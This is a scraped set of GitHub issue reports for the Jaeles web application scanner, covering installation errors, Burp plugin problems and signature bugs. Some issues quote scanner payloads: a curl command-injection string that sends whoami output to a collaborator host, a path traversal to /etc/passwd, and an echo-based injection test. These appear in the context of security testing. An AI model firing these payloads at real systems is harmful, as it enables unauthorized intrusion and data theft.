jaeles-project / jaeles
The Swiss Army knife for automated Web Application Testing
Home Page: https://jaeles-project.github.io/
License: MIT License
sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~
What should I do?
Command used :
(1) jaeles server --verbose
(2) The JWT Token has been saved in ~/.jaeles-burp/config.json.
(3) Login UI with the creds.
Procedure to produce :
When pressing the "Test Connection" button in Burp Suite Community Edition, the jaeles server produced a "401" error. Meanwhile, "Send to Endpoint" does not work either.
error:
Import to external Jaeles ...
<urllib2.Request instance at 0x6>
why ?
thanks @j3ssie
Thank you for this awesome project at first!
I recently used Jaeles with the burp plugin, so I started Jaeles in server mode.
Unfortunately, I have noticed that when supplying an additional value for a parameter defined in a signature, it won't be replaced by the Jaeles API.
For example, my parameter in the signature looks as follows:
variables:
  - dest: |
      example.com
I call Jaeles like :
jaeles server -v -s "my-signature.yaml" -p 'dest=xxx.burpcollaborator.net' --proxy http://127.0.0.1:8080
Following test payload is in the signature:
payloads:
  - '\"curl http://{{.dest}}/.testing/?vuln=16?user=\\\`whoami\\\`\"'
But when observing the requests Jaeles makes through burp, I see that the parameter value of "dest" is not replaced with "xxx.burpcollaborator.net".
It still sets the value as initially defined:
...http://example.com/.testing/?vuln=16?user=...
First of all, I ❤❤❤ your tools, man.
When generating output in html it would be nice to view the file in the browser other than it downloading since it has no file extension.
When I try to use Generator with some headers, the payload doesn't work. For example:
# info to search robots.txt
id: test
type: fuzz
info:
  name: Robots
  risk: Low
payloads:
  - 'robots.txt'
  - 'teste'
requests:
  - generators:
      - Header("{{.payload}}", "Arbitraty")
When I use this template, the jaeles will send 2 requests using the header "Arbitraty" but with the same payload, which is the last payload that I set (in this case: teste)
However, if I change the Arbitraty word for Referer, it will work normally. This problem doesn't occur only with some headers.
Hello, I would like to know how to add a new signature manually since through the UI a 404 error returns, please and thank you
Hello, I would like to ask, how to do scan on a web app that requires login/ authentication?
BTW, it's a Laravel 8/9 web app.
Thank you.
Web UI doesn't start, gives error,
{"code":401,"message":"cookie token is empty"}
Trying to execute the CLI:
$ jaeles scan -u https://localhost:8080
[Error] No signature loaded
Prior to execution, jaeles config -a init and -a update were run to ensure signatures were available.
Is there something else to do?
Thanks!
Getting this error while running any command :
Can't connect to DB at /root/.jaeles/sqlite3.db
Please, add HTTP/2 Support requests
Hi. When compiling the latest version of the code, I get the following error:
# github.com/appleboy/gin-jwt
src/github.com/appleboy/gin-jwt/auth_jwt.go:457:14: not enough arguments in call to c.SetCookie
have (string, string, int, string, string, bool, bool)
want (string, string, int, string, string, http.SameSite, bool, bool)
src/github.com/appleboy/gin-jwt/auth_jwt.go:475:14: not enough arguments in call to c.SetCookie
have (string, string, number, string, string, bool, bool)
want (string, string, int, string, string, http.SameSite, bool, bool)
src/github.com/appleboy/gin-jwt/auth_jwt.go:540:14: not enough arguments in call to c.SetCookie
have (string, string, int, string, string, bool, bool)
want (string, string, int, string, string, http.SameSite, bool, bool)
It seems related to this issue in the gin-jwt project: appleboy/gin-jwt#230. Some users have solved the issue by implementing go modules.
Regards.
Command:
./jaeles scan -s templates/ -u http://testphp.vulnweb.com/listproducts.php?cat=2 -c 50 --no-db
Error (if using --no-db):
Jaeles beta v0.14 by @j3ssiejjj
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0xb0 pc=0xc4a966]
goroutine 1 [running]:
github.com/jinzhu/gorm.(*DB).clone(0x0, 0x4ebfa4)
/go/pkg/mod/github.com/jinzhu/[email protected]/main.go:853 +0x26
github.com/jinzhu/gorm.(*DB).NewScope(0x0, 0x111fb20, 0xc00012c000, 0xc0004182d0)
/go/pkg/mod/github.com/jinzhu/[email protected]/main.go:204 +0x2f
github.com/jinzhu/gorm.(*DB).Create(0x0, 0x111fb20, 0xc00012c000, 0x1)
/go/pkg/mod/github.com/jinzhu/[email protected]/main.go:482 +0x43
github.com/jaeles-project/jaeles/database.NewScan(0xc0004cc7e0, 0x12, 0x13435a3, 0x1a, 0xc0004ccac0, 0x1b, 0xc0004ccae0, 0x1c, 0xc0004ccb00, 0x1d, ...)
/go/src/github.com/jaeles-project/jaeles/database/scan.go:37 +0x33e
github.com/jaeles-project/jaeles/cmd.SelectSign()
/go/src/github.com/jaeles-project/jaeles/cmd/root.go:198 +0x46a
github.com/jaeles-project/jaeles/cmd.runScan(0xc000470580, 0xc0004040e0, 0x0, 0x7, 0x0, 0x0)
/go/src/github.com/jaeles-project/jaeles/cmd/scan.go:36 +0x42
github.com/spf13/cobra.(*Command).execute(0xc000470580, 0xc000404070, 0x7, 0x7, 0xc000470580, 0xc000404070)
/go/pkg/mod/github.com/spf13/[email protected]/command.go:842 +0x460
github.com/spf13/cobra.(*Command).ExecuteC(0x1fbff40, 0x44813a, 0x1fd5680, 0xc000000180)
/go/pkg/mod/github.com/spf13/[email protected]/command.go:950 +0x349
github.com/spf13/cobra.(*Command).Execute(...)
/go/pkg/mod/github.com/spf13/[email protected]/command.go:887
github.com/jaeles-project/jaeles/cmd.Execute()
/go/src/github.com/jaeles-project/jaeles/cmd/root.go:33 +0x31
main.main()
/go/src/github.com/jaeles-project/jaeles/main.go:6 +0x20
I'm getting installation error
root@wind:~# go install github.com/jaeles-project/jaeles@latest
sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~
Actually This Tool Is So Great , But In type: fuzz There Is One Feature Missing
It Is Fuzz Cookie Header , This Tool Give Us To Replace Value Of Header Name But Let e.g.
Cookie Header Of The Origin Request Like This
Cookie: session=1; id=22; lang=en
So It Is Possible To Fuzz Cookie Here Like Fuzzing Body e.g. Can You Add Something Like That
id: Cookie-Fuzz
info:
  name: Fuzz Cookie Headers
  risk: Critical
type: fuzz
payloads:
  - '../../../../etc/passwd'
requests:
  - generators:
      - Header-Fuzz("{{.payload}}", "Cookie")
So Here Header-Fuzz Generate Three Requests
Cookie: session=../../../../etc/passwd; id=22; lang=en
Cookie: session=1; id=../../../../etc/passwd; lang=en
Cookie: session=1; id=22; lang=../../../../etc/passwd
So Can This Happen ?
Hello, what is the syntax to use raw request option?
jaeles scan -r request.txt ?
Jaeles has a lot of feature but one feature is missing that is connecting many template like nuclei. I use nuclei only for that feature. But I really love it jaeles has that same feature too
sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~
I use jaeles with the following command:
jaeles scan -c 50 -s '/home/mydirectory/jaeles-signatures/sensitive/.*' -U example_hosts.txt -L 2 --proxy http://127.0.0.1:8080
IMMEDIATELY CPU SPIKES TO 100% after this and my pc fan running like a helicopter
jaeles scan -c 50 -s '/home/mydirectory/jaeles-signatures/sensitive/.*' -U example_hosts.txt -L 2
It also causes the CPU to spike to 100% later on and keeps it at not less than 50% while the scan is running. Furthermore, there was no more internet connection on my home router. To have the connection again I have to end the jaeles process and restart my router.
For the first problem I need help, if possible.
The connection problem would be solved if there were an option to add a resolvers file, with a flag like -r resolvers.txt, as well as a rate limit, hopefully. jaeles is a very nice tool and always thanks for providing it.
Hello @j3ssie, how are you?
Today I tried to test with my signature for XSS
https://github.com/ghsec/ghsec-jaeles-signatures/blob/master/Dom-xss.yaml
[0006] DEBUG Detection: HasPopUp() -- false
[0006] ERROR chrome failed to start:
[46504:46504:0312/231756.623137:ERROR:content_main_runner_impl.cc(325)] --no-sandbox should be used together with --no--zygote
What's wrong? is this error jaeles or chrome?
Add an -pbar option similar to nuclei to show the total number of packets being sent
As we can see in the docs:
Header() and Body() have same usage of Query() generator.
- Query("{{.payload}}", "{{.name}}")
works fine, but
- Body("{{.payload}}", "{{.name}}")
just ignored.
I tried to set the method to POST, but anyways it doesn't work
My config is -
id: ci-fuzz-01
info:
  name: Command Injection Reflection
  risk: High
payloads:
  - 'echo TJEGSE$((2314+6548321))$(echo TJEGSE)TJEGSE'
requests:
  - detections:
      - StringSearch("response", "6550635") && (StringCount("response", "6550635") > StringCount("oresponse", "6550635"))
    generators:
      - Body("{{.payload}}", "{{.name}}")
type: fuzz
variables:
  - name: 'cmd
      '
Send the request from burp to Jaeles. And use jaeles to brute force password or fuzz directories.
Why we need to do that?
Hey Guys,
Been playing with jaeles for a few days now and this is what I did to get it to work:
GO111MODULE=on go install github.com/jaeles-project/jaeles@latest, the binary is inside the go folder. I have not tested this so unsure how it works.
jaeles config init
you get an error, delete the folder .jaeles and try again, you should see the signatures being downloaded.
Otherwise, the tool seems to work like charm. I hope this helps.
I see the "My introduction slide about Jaeles" link, but it's not found.
Pls help me with how to get started with this.
Apologies for opening a new issue, but the previous one #12 was closed before I had a chance to test the changes.
After pulling the new Jaeles and running a config -a update, still says "No signatures loaded".
Is there a specific directory or environment in which Jaeles should be run? For some reason it's not locating signatures when running a simple scan command.
I did by
jaeles report -o mysavedscanfolder
But it does nothing to save
wget https://github.com/jaeles-project/jaeles/releases/download/beta-v0.17/jaeles-v0.17-darwin.zip
unzip jaeles-v0.17-darwin.zip
git clone --depth=1 https://github.com/jaeles-project/jaeles-signatures ./jaeles-signatures/
./jaeles config -a reload --signDir ./jaeles-signatures/
./jaeles server
POST /auth/login HTTP/1.1
Content-Type: application/json
User-Agent: Jaeles Scanner
Host: 127.0.0.1:5000
Content-Length: 54
Connection: close
{
"username": "jaeles",
"password": "your_password_here"
}
https://github.com/jaeles-project/jaeles-plugins
refer. https://jaeles-project.github.io/installation/burp-integration/
Hi,
Jaeles is most powerful tool, I love it. But can I use burp collaborator in script. Like BurpBounty Burp plugin do. Is there anyway I can give {BC} and it replace by burp collaborator address?
I am installing jaeles in VPS and facing error when installing using GO. I run go install github.com/jaeles-project/jaeles@latest
and getting following error after some installation.
sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~
I tried:
go install github.com/jaeles-project/jaeles@latest
and it failed with error:
sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~
then I tried:
GO111MODULE=on go install github.com/jaeles-project/jaeles@latest
and I got the same error.
I tried the docker image but is not working, tried to get a shell into it to try to fix the docker image but bin/bash is not present. anyone knows how to successfully install Jaeles? am I missing something?
the only ones that are working are the pre-compiled versions.
Hi
I'm finding only "info" level vulns, probably due to the lack of a rate-limiting feature to throttle the number of requests per second. Is there an option to do this that I may not have perceived yet?
Regards
can you also add option to add resolvers file
The repeat option on yaml template is not working. I tried to repeat the request and no success
After the basic signature is scanned, jaeles does not stop running or print the vulnerability results of the scan, but still sending just four packets of HEAD, POST, GET, PATCH, the requested url is the same, just like DDOS .
I have executed reload --signDir jaeles-signatures, the command used when scanning is
./jaeles-v0.9 scan -u https://seaii-blog.com -v.
My operating system is osx.
I am getting error on running
λ jaeles scan -u http://brutelogic.com.br/xss.php -s Dom-xss.yaml
test rule:
id: test
info:
  name: Test
  risk: Critical
type: fuzz
payloads:
  - 'test'
requests:
  - generators:
      - Query("[[.original]]{{.payload}}")
    detections:
      - OriginResponseTime() > 0
jaeles scan -s test.yaml -u https://example.com\?param\=1 -v --debug
Jaeles beta v0.7 by @j3ssiejjj
[0000] INFO Load config from: /root/.jaeles/config.yaml
[0000] INFO Summary output: out/jaeles-summary.txt
[0000] INFO Signatures Loaded: 1
[0000] INFO Signature Loaded: test.yaml
[0000] INFO Start Scan with ID: 61343531626561382d376436302d313165612d613733392d393630303030313263303833
[0000] INFO Input Loaded: 1
[0000] DEBUG Checking backround task
[0000] DEBUG Generator: Query("[[.original]]test")
[0000] DEBUG injectedString: [[.original]]test
[0000] DEBUG paramName: undefined
[0000] DEBUG New Parsed Reuqest: 1
[Sent] GET https://example.com?param=1test 200 OK HTTP/1.1 0.42473274
[0000] DEBUG Detection: OriginResponseTime() > 0
Hello,
I might have missed something but it looks like we can't modify the original parameters names by using generators.
For example: What I would like to automate:
hxxps://test.com/index.php?test1=aaa&test2=aaaa -> hxxps://test.com/index.php?test1[]=aaa&test2[]=aaaa
Did I miss something or would this be an awesome functionality to add? 😁
Regards,
Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory:
An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.
More details about features here.
Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.
Mainly because this is giving visibility to your tool and improve its referencing.
The badge shows your community that you are inventoried. It looks good but also shows you care about your project, that your tool is referenced.
Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.
If you want to thank us, you can help make our open project better known by tweeting about it! For example:
That's all, this message is just to notify you if you care. Else you can close this issue.
Hello, is it possible to mount the web UI and the rest on a web server and pass the Burp Suite traffic from my machine?